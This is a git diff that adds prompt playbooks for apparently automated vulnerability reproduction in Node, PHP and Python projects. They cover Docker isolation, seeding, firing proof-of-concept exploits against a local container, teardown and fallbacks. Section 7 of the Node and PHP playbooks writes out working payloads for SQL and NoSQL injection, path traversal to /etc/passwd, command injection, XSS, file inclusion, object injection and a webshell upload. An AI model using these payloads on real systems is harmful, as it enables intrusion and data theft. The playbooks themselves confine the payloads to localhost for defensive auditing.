+  and `main`/`module`/`exports`/`bin`. The `start`/`build` scripts are the
+  ground truth for how the project runs.
+- **Node version:** `.nvmrc`, `.tool-versions`, or `engines.node` in
+  `package.json`. Match the image tag to it.
+
+```sh
+cat .nvmrc 2>/dev/null
+node -e 'p=require("./package.json");console.log(JSON.stringify({scripts:p.scripts,main:p.main,bin:p.bin,engines:p.engines},null,2))' 2>/dev/null \
+  || grep -E '"(scripts|main|bin|engines|start|build|dev)"' package.json
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Never copy a host `node_modules` into the build — it may carry host-native
+binaries and stale state. Let the container install fresh (the Dockerfiles below
+do this; the `.dockerignore` keeps it out of the build context):
+
+```sh
+printf 'node_modules\nnpm-debug.log\n.git\n' > /tmp/va-$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, build, and
+the correct start command for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Node tag from step 1 (fall back to a recent LTS, e.g. `node:22-slim`).
+The image installs deps with the detected package manager, builds if a `build`
+script exists, and defers the start command to run time.
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM node:22-slim
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      ca-certificates curl git python3 make g++ \
+  && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+# Copy manifests first for layer caching; tolerate missing lockfiles.
+COPY package.json ./
+COPY package-lock.json* pnpm-lock.yaml* yarn.lock* ./
+# Install with whichever lockfile is present (deterministic install per PM).
+RUN if [ -f pnpm-lock.yaml ]; then corepack enable && pnpm install --frozen-lockfile; \
+    elif [ -f yarn.lock ]; then corepack enable && yarn install --frozen-lockfile; \
+    elif [ -f package-lock.json ]; then npm ci; \
+    else npm install; fi
+COPY . .
+# Build if the project defines one (TS compile / bundler); ignore if absent.
+RUN npm run build --if-present
+EXPOSE 3000
+# overridden at run time per framework (see below)
+CMD ["node", "-e", "console.log('set a start command')"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid \
+  -t $IMG .
+```
+
+Start command depends on how the project runs (bind to `0.0.0.0`, not
+`localhost`, so the mapped port is reachable):
+
+- **Has a `start` script:** `npm start` (or `pnpm start` / `yarn start`). This
+  is the safest default — it is exactly how the project boots.
+- **Express/Koa/Fastify plain entry:** `node dist/index.js` (after build) or
+  `node src/index.js`. For TS without a build step: `npx tsx src/index.ts`.
+- **NestJS:** `node dist/main.js` after `npm run build`; dev: `npm run start:dev`.
+- **Next.js:** `npm run build && npm run start` (prod server on `3000`), or
+  `npm run dev` for the dev server.
+- **Library (no server):** there is nothing to serve — go to Fallbacks and drive
+  the vulnerable API from a unit test (`method: unit-test`).
+
+Most frameworks honor `PORT` (env) and/or `HOST`. Pass `-e PORT=3000 -e HOST=0.0.0.0`
+when the app reads them; otherwise the in-container port is whatever the code
+hardcodes — read the listen() call to confirm.
+
+---
+
+## 4. Dependencies
+
+Install reproducibly from the lockfile (done in the image above; the standalone
+forms, e.g. for the Fallbacks test runs):
+
+```sh
+npm ci                 # package-lock.json — clean, lockfile-exact
+pnpm install --frozen-lockfile
+yarn install --frozen-lockfile
+npm install            # only if there is no lockfile at all
+```
+
+- Honor the lockfile exactly; do **not** `npm update` / bump versions (that
+  changes the audited dependency set).
+- Native addon build failures (`node-gyp`, `bcrypt`, `sharp`, `sqlite3`) → the
+  image already ships `python3 make g++`; add `-dev` libs only if a specific
+  module needs them.
+- `postinstall` scripts run by default during install. That is intended here
+  (the audited project would run them too) — but it is also why the build must
+  stay in the container, never on the host.
+- TypeScript that is run directly (no build script) needs `tsx`/`ts-node`
+  available; `npx tsx` fetches it on demand inside the container.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:3000 \
+  -e NODE_ENV=development -e PORT=3000 -e HOST=0.0.0.0 \
+  $IMG npm start
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port (`:3000`) and the start command per framework. If the app
+hardcodes a different listen port, map that instead (`-p 127.0.0.1:$PORT:8080`).
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -sS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common in-container ports: Express/Nest/Next **3000**, Fastify **3000**
+(default), but always confirm from the `listen()` call / `PORT` env. A 404 on
+`/` still means the server is up — any HTTP response counts as healthy; look for
+the framework's boot log line (`Listening on`, `Nest application successfully
+started`, `ready - started server on`).
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** run the project's own migration/seed scripts inside the
+  container (read `package.json` scripts for the real names):
+
+  ```sh
+  docker exec $CN npm run migrate --if-present
+  docker exec $CN sh -c 'npx prisma migrate deploy 2>/dev/null || npx sequelize-cli db:migrate 2>/dev/null || true'
+  docker exec $CN npm run seed --if-present
+  ```
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"email":"poc@local.test","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JWT/bearer apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"email":"poc@local.test","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" | node -e 'process.stdin.on("data",d=>{try{const j=JSON.parse(d);console.log(j.token||j.accessToken||j.access_token||"")}catch(e){}})')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQL/NoSQL injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--" | tee /tmp/poc.$FID.out
+# NoSQL operator injection (Mongo) — JSON body that smuggles an operator:
+curl -s -H 'Content-Type: application/json' \
+  -d '{"username":"admin","password":{"$ne":null}}' "http://127.0.0.1:$PORT/login"
+
+# Path traversal / arbitrary file read — pull a host file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# Prototype pollution — pollute, then observe the gadget take effect in a later request:
+curl -s -H 'Content-Type: application/json' \
+  -d '{"__proto__":{"polluted":"yes"}}' "http://127.0.0.1:$PORT/<merge-sink>"
+curl -s "http://127.0.0.1:$PORT/<gadget-route>"   # pollution lives in the app process only; observe it via the app, a fresh 'docker exec node' never sees it
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN sh -c 'node -e "require(\"http\").createServer((q,s)=>s.end(\"CANARY\")).listen(9999)"'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Command injection / RCE — prove exec via a benign in-container sentinel, then read it back
+# (NEVER run destructive commands):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# Reflected/stored XSS — confirm the payload is reflected unescaped in the response body:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" | grep -o '<script>alert(1)</script>'
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, polluted property, 500 with stack) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`; no outbound
+connections; no real data; side effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library package, or web boot blocked):** drive the
+   vulnerable function directly with a Node test in the container. Set
+   `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink:
+   docker run --rm $IMG sh -c \
+     'npx jest path/to/file.test.js 2>/dev/null || npx vitest run path/to/file.test.ts 2>/dev/null || npx mocha test/<focused>.js'
+
+   # Or a one-off harness (no -v mount: it would hide the image's node_modules and dist/):
+   docker run --rm $IMG node -e '
+     const m = require("./dist/vulnerable.js");
+     const out = m.parse("<payload>");        // call vulnerable API
+     if (!/<impact-marker>/.test(String(out))) process.exit(1);
+     console.log("IMPACT:", out);'
+   # TypeScript source (no build): swap `node -e` for `npx tsx -e` / `npx ts-node -e`.
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/env, native addon):**
+   record that the dependency set installs, the build succeeds, and the
+   vulnerable code is present and reachable, with the source→sink trace as
+   evidence. Set `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input plus the line-referenced source→sink path showing why
+   it triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/php.md b/plugins/security/prompts/playbooks/php.md
new file mode 100644
index 0000000..0c623d0
--- /dev/null
+++ b/plugins/security/prompts/playbooks/php.md
@@ -0,0 +1,399 @@
+# ENV Playbook — PHP
+
+Build, run, and exploit a PHP target (Laravel / Symfony / WordPress / Slim /
+plain package) to reproduce a candidate finding with a real PoC. Docker-first;
+the native PHP toolchain (php, composer) may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls composer.json composer.lock artisan symfony.lock wp-config.php \
+   wp-load.php index.php public/index.php 2>/dev/null
+find . -maxdepth 3 -name '*.php' -not -path '*/vendor/*' | head
+```
+
+- **Manifests:** `composer.json` (almost always; defines deps + `autoload` +
+  `require.php`), `composer.lock` (pins exact versions — restore from this). No
+  composer at all → a legacy/WordPress tree driven only by `*.php` + an include
+  graph.
+- **Framework tells** (read `composer.json` `require`, or the entrypoint):
+  - Laravel → `laravel/framework` dep, an `artisan` CLI, `public/index.php`,
+    `routes/web.php` / `routes/api.php`, config under `config/`, `.env`.
+  - Symfony → `symfony/framework-bundle`, `symfony.lock`, `bin/console`,
+    `public/index.php`, routes in `config/routes*` or attributes.
+  - Slim / Lumen / Mezzio → `slim/slim`, `laravel/lumen-framework`,
+    `mezzio/mezzio`; small `public/index.php` bootstrap.
+  - WordPress → `wp-config.php` / `wp-load.php`, `wp-content/` (plugins/themes
+    are the usual finding site); often no `composer.json`.
+  - Plain package / library (no web entry) → `composer.json` with `autoload`
+    PSR-4 and no front controller. Drive it from a test (see Fallbacks).
+- **Entry point:** the web root is the dir holding the front controller —
+  `public/index.php` (Laravel/Symfony/Slim) or `index.php` at the repo root
+  (WordPress/legacy). That dir is the docroot for the server.
+- **PHP version:** `require.php` in `composer.json`, a `.php-version`, or a
+  platform pin under `config.platform.php` in `composer.json`. Match the image
+  tag to it (PHP minor matters for syntax + extension ABI).
+
+```sh
+php -r 'echo json_encode(json_decode(file_get_contents("composer.json"))->require ?? new stdClass);' 2>/dev/null \
+  || grep -E '"(php|laravel/framework|symfony/framework-bundle|slim/slim)"' composer.json
+cat .php-version 2>/dev/null
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Never copy a host `vendor/` into the build — it may carry platform-specific
+state and stale autoload maps. Let the container install fresh; keep it (and the
+local env) out of the build context:
+
+```sh
+printf 'vendor\n.env\n.git\nnode_modules\nstorage/logs/*\n' > /tmp/va-$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, the right PHP
+extensions, and the correct start command (php-fpm + nginx, or a CLI server) for
+you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the PHP tag from step 1 (fall back to a recent stable, e.g. `php:8.3-cli`).
+The `*-cli` image plus PHP's built-in web server is the simplest way to serve an
+app for a PoC; `php:8.3-apache` is the alternative when the app expects Apache
+rewrite rules. Install the extensions the app needs (read `composer.json`
+`require` for `ext-*`) — `pdo_mysql`, `pdo_pgsql`, `mbstring`, `intl`, `gd`,
+`zip`, `bcmath`, `sodium` are the common ones.
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM php:8.3-cli
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      git unzip curl libzip-dev libicu-dev libpq-dev libonig-dev \
+      libpng-dev libjpeg-dev libxml2-dev \
+  && docker-php-ext-configure gd --with-jpeg \
+  && docker-php-ext-install -j"$(nproc)" \
+      pdo_mysql pdo_pgsql mbstring intl gd zip bcmath \
+  && rm -rf /var/lib/apt/lists/*
+# Composer from the official image (pinned, no host toolchain needed):
+COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
+WORKDIR /app
+# Manifests first for layer caching; skip scripts and the autoloader at build time.
+COPY composer.json composer.lock* ./
+RUN composer install --no-interaction --no-scripts --no-autoloader --prefer-dist \
+      --no-progress 2>/dev/null || true
+COPY . .
+RUN composer dump-autoload --optimize 2>/dev/null || true
+EXPOSE 8000
+# overridden at run time per framework (see below)
+CMD ["php", "-v"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID -t $IMG .
+```
+
+Start command depends on the framework (bind to `0.0.0.0`, not `localhost`, so
+the mapped port is reachable):
+
+- **Laravel:** `php artisan serve --host=0.0.0.0 --port=8000`. Needs an `APP_KEY`
+  — generate one at boot (see Run & health-check). Docroot is `public/`.
+- **Symfony:** `php -S 0.0.0.0:8000 -t public public/index.php` (built-in
+  server), or `symfony serve` if the Symfony CLI is present. Set
+  `APP_ENV=dev APP_DEBUG=1` so it boots without prod secrets.
+- **Slim / Lumen / Mezzio / plain front controller:**
+  `php -S 0.0.0.0:8000 -t public` (or `-t .` if `index.php` is at the root).
+- **WordPress / legacy (root `index.php`):** `php -S 0.0.0.0:8000 -t .` for a
+  quick serve; if it relies on `.htaccess` rewrites, use the `php:8.3-apache`
+  image instead (docroot `/var/www/html`, port 80).
+- **Library / package (no front controller):** there is nothing to serve — go to
+  Fallbacks and drive the vulnerable API from a test (`method: unit-test`).
+
+> PHP's built-in server is single-threaded: a PoC that needs the app to make a
+> second request to itself (some SSRF/webhook flows) can deadlock. For those,
+> set `-e PHP_CLI_SERVER_WORKERS=4` (PHP ≥ 7.4) for `php -S`, or use the apache image.
+
+---
+
+## 4. Dependencies
+
+Restore from the lockfile — do **not** upgrade, that changes the audited
+dependency set. Inside the container (or in the build):
+
+```sh
+# Lockfile present (the common, reproducible case):
+composer install --no-interaction --prefer-dist --no-progress
+
+# Build-time split used in the image (deps without running project scripts,
+# then the autoloader) — safe when post-install scripts need a full app/env:
+composer install --no-interaction --no-scripts --no-autoloader --prefer-dist
+composer dump-autoload --optimize
+
+# No composer.json at all (WordPress/legacy): nothing to restore — the include
+# graph is the code under test; just serve the tree.
+```
+
+- Honor `composer.lock` exactly. Avoid `composer update` / version bumps.
+- `--no-scripts` at build time avoids post-install hooks that need a DB or
+  `.env` (e.g. Laravel package discovery); re-run them at run time once the app
+  is configured: `composer run-script post-autoload-dump` or
+  `php artisan package:discover`.
+- Composer post-install/autoload scripts run real project code. That is intended
+  here (the audited project runs them too) — which is exactly why the install
+  must stay in the disposable container, never on the host.
+- Platform mismatch (`require.php`, `ext-*`) → match the image tag and add the
+  missing `docker-php-ext-install <ext>`. `--ignore-platform-reqs` is a last
+  resort and changes behavior — note it if used.
+- WordPress plugin/theme findings: drop the plugin/theme into a stock WP install
+  (see Seed) rather than serving it standalone.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+# Laravel example (generate a key and serve; bind inside the container to 0.0.0.0):
+docker run -d --name $CN -p 127.0.0.1:$PORT:8000 \
+  -e APP_ENV=local -e APP_DEBUG=true \
+  $IMG sh -c 'cp -n .env.example .env 2>/dev/null; \
+    php artisan key:generate --force 2>/dev/null; \
+    php artisan serve --host=0.0.0.0 --port=8000'
+
+# Symfony / Slim / plain front controller:
+# docker run -d --name $CN -p 127.0.0.1:$PORT:8000 -e APP_ENV=dev -e APP_DEBUG=1 \
+#   $IMG php -S 0.0.0.0:8000 -t public public/index.php
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port (`:8000`) and the start command per framework. For the apache
+image map port 80 instead (`-p 127.0.0.1:$PORT:80`).
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -sS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common in-container ports: `php artisan serve` / `php -S` examples here **8000**
+(whatever you pass), the apache image **80**, `symfony serve` **8000**. A 404 or
+even a Laravel/Symfony error page at `/` still means the server is up — any HTTP
+response counts as healthy; look for `Development Server (http://0.0.0.0:8000)
+started` in the logs.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Laravel DB:** the default `sqlite` driver needs no external DB — point at a
+  file and migrate inside the container:
+
+  ```sh
+  docker exec $CN sh -c 'touch database/database.sqlite'
+  docker exec $CN php artisan migrate --force
+  # synthetic user via tinker (substitute the real User model if namespaced):
+  docker exec $CN php artisan tinker --execute \
+    'App\Models\User::firstOrCreate(["email"=>"poc@local.test"],["name"=>"poc","password"=>bcrypt("Poc-Passw0rd!")]);'
+  docker exec $CN php artisan db:seed --force 2>/dev/null || true
+  ```
+
+  If the app hardcodes mysql/pgsql, run a sidecar on a private network and point
+  `DB_HOST` at it: `docker network create va-$FID-net` then
+  `docker run -d --name $CN-db --network va-$FID-net -e MYSQL_ROOT_PASSWORD=poc \
+   -e MYSQL_DATABASE=app mysql:8` and add `--network va-$FID-net -e DB_HOST=$CN-db`
+  to the app `run`.
+
+- **Symfony DB:** `php bin/console doctrine:database:create --if-not-exists` then
+  `php bin/console doctrine:migrations:migrate --no-interaction`; create a user
+  via a fixture (`doctrine:fixtures:load --no-interaction`) or a one-off
+  `bin/console` command.
+
+- **WordPress:** seed a stock install with WP-CLI inside the container:
+  `wp core install --url=http://127.0.0.1:$PORT --title=poc --admin_user=poc
+   --admin_password=Poc-Passw0rd! --admin_email=poc@local.test`, then
+  `wp plugin activate <slug>` (or `wp theme activate`) for the code under test.
+
+- **Auth flow:** if the PoC needs a session, log in via the app's own login route
+  with the seeded creds and keep the cookie jar. Laravel/Symfony forms require a
+  CSRF token — fetch the login page, scrape the token, then post:
+
+  ```sh
+  # Laravel: token is in a hidden _token input (and the XSRF cookie):
+  TOKEN=$(curl -s -c /tmp/jar.$FID "http://127.0.0.1:$PORT/login" \
+    | grep -oP 'name="_token"[^>]*value="\K[^"]+')
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID -L \
+    -d "_token=$TOKEN&email=poc@local.test&password=Poc-Passw0rd!" \
+    "http://127.0.0.1:$PORT/login"
+  ```
+
+  Token/API apps (Sanctum/Passport/JWT): POST creds to the token endpoint,
+  capture the returned token, send it as `Authorization: Bearer <tok>`.
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQL injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--%20" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — pull a container-local file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# Local/Remote file inclusion (include/require on user input) — prove inclusion
+# via the php:// filter to leak source, or include an in-container sentinel:
+curl -s "http://127.0.0.1:$PORT/?page=php://filter/convert.base64-encode/resource=index" | head
+docker exec $CN sh -c 'echo "<?php echo 92657*1; ?>" > /tmp/lfi.php'
+curl -s "http://127.0.0.1:$PORT/?page=/tmp/lfi" | grep -o 92657
+
+# PHP object injection (unserialize on user input) — send a crafted serialized
+# payload that triggers a benign in-container gadget (touch a sentinel):
+curl -s --data-urlencode "data=$(cat /tmp/payload.$FID)" "http://127.0.0.1:$PORT/<sink>"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# Command injection / RCE (shell_exec/exec/system on input) — benign sentinel:
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN php -S 127.0.0.1:9999 -t /tmp   # canary in-container
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Reflected/stored XSS — confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Unrestricted file upload → webshell — upload, then request the dropped file
+# and confirm it executed an in-container sentinel (NEVER a real shell):
+curl -s -b /tmp/jar.$FID -F "file=@/tmp/shell.$FID;type=image/png;filename=poc.php" \
+  "http://127.0.0.1:$PORT/upload"
+curl -s "http://127.0.0.1:$PORT/uploads/poc.php?c=id" | head
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, decoded
+  source, sentinel file, reflected script, 500 with stack/whoops page) →
+  `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN` (and any sidecar
+DB on a private `va-$FID-net`); no outbound connections; no real data; side
+effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN $CN-db 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker network rm va-$FID-net 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/payload.$FID /tmp/shell.$FID
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library/package, or web boot blocked):** drive the
+   vulnerable function directly with a PHP snippet/test in the container, loading
+   the project autoloader. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink:
+   docker run --rm -v "$WT":/app -w /app $IMG \
+     sh -c './vendor/bin/phpunit --filter <TestName> 2>/dev/null \
+            || ./vendor/bin/pest tests/<Focused>Test.php 2>/dev/null'
+
+   # Or a one-off harness that calls the vulnerable API and asserts impact:
+   docker run --rm -v "$WT":/app -w /app $IMG php -r '
+     require "vendor/autoload.php";
+     $out = (new \Vendor\Pkg\Vuln())->parse("<payload>");   // call vulnerable API
+     if (strpos((string)$out, "<impact-marker>") === false) exit(1);
+     echo "IMPACT: $out\n";'
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/`APP_KEY`/extension):**
+   record that the dependency set installs, the autoloader builds, and the
+   vulnerable code is present and reachable, with the source→sink trace as
+   evidence. Set `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input (e.g. the serialized object-injection payload, the
+   traversal string) plus the line-referenced source→sink path showing why it
+   triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/python.md b/plugins/security/prompts/playbooks/python.md
new file mode 100644
index 0000000..6930f4d
--- /dev/null
+++ b/plugins/security/prompts/playbooks/python.md
@@ -0,0 +1,335 @@
+# ENV Playbook — Python
+
+Build, run, and exploit a Python target (Django / Flask / FastAPI / plain
+package) to reproduce a candidate finding with a real PoC. Docker-first; the
+native Python toolchain may be absent on the host. Keep ALL traffic inside the
+local container — no external hosts, no real credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls pyproject.toml requirements*.txt setup.py setup.cfg Pipfile Pipfile.lock \
+   poetry.lock uv.lock manage.py 2>/dev/null
+find . -maxdepth 3 -name '*.py' | head
+```
+
+- **Manifests:** `pyproject.toml` (PEP 621 / poetry / uv / hatch), one or more
+  `requirements*.txt` (pip), `setup.py` / `setup.cfg` (legacy), `Pipfile(.lock)`
+  (pipenv). Lockfiles: `poetry.lock`, `uv.lock`, `Pipfile.lock`.
+- **Framework tells:**
+  - Django → `manage.py`, `*/settings.py`, `wsgi.py`/`asgi.py`, `INSTALLED_APPS`,
+    `urls.py`; `django` in deps.
+  - Flask → `from flask import Flask`, an `app = Flask(__name__)`, often
+    `app.py` / `wsgi.py`; `flask` in deps.
+  - FastAPI → `from fastapi import FastAPI`, `app = FastAPI()`, ASGI; `fastapi`
+    + `uvicorn` in deps.
+  - Plain package / CLI (no web server) → only a `pyproject.toml`/`setup.py`
+    with a library or `console_scripts`, no app object.
+- **Python version:** `.python-version`, `requires-python` in `pyproject.toml`,
+  `python_requires` in `setup.cfg`, or a `runtime.txt`. Match the image to it.
+
+```sh
+cat .python-version 2>/dev/null
+grep -E 'requires-python|python_requires' pyproject.toml setup.cfg 2>/dev/null
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, migrations,
+and the correct start command for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
